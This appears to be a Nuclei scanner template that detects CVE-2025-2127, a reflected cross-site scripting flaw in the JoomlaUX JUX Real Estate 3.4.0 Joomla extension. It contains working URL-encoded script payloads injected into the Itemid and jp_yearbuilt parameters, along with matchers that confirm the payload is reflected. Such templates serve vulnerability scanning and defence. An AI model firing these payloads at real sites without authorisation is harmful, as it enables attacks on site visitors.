id: CVE-2025-2127

info:
  name: JoomlaUX JUX Real Estate 3.4.0 - Reflected XSS
  author: 3th1c_yuk1
  severity: medium
  description: |
    A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2127
    - https://vuldb.com/?id.299040
    - https://vuldb.com/?ctiid.299040
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2025-2127
    cwe-id: CWE-79
    epss-score: 0.00034
    epss-percentile: 0.08308
    cpe: cpe:2.3:a:joomlaux:jux_real_estate:3.4.0:*:*:*:*:joomla:*:*
  metadata:
    vendor: joomlaux
    product: jux_real_estate
    framework: joomla
    fofa-query: body="joomlaux"
    verified: true
    max-request: 2
  tags: cve,cve2025,joomlaux,joomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search"
      - "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'joomlaux'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4b0a00483046022100920afd16c8ac78f5a011935d3cf97872b47362cd2fc909907f6c74a2ab4b017c02210084d434b80d7425fdd9f3d2d44fba7a00610f80bcfeffe6b1b99ccda3b637f29e:922c64590222798bb761d5b6d8e72950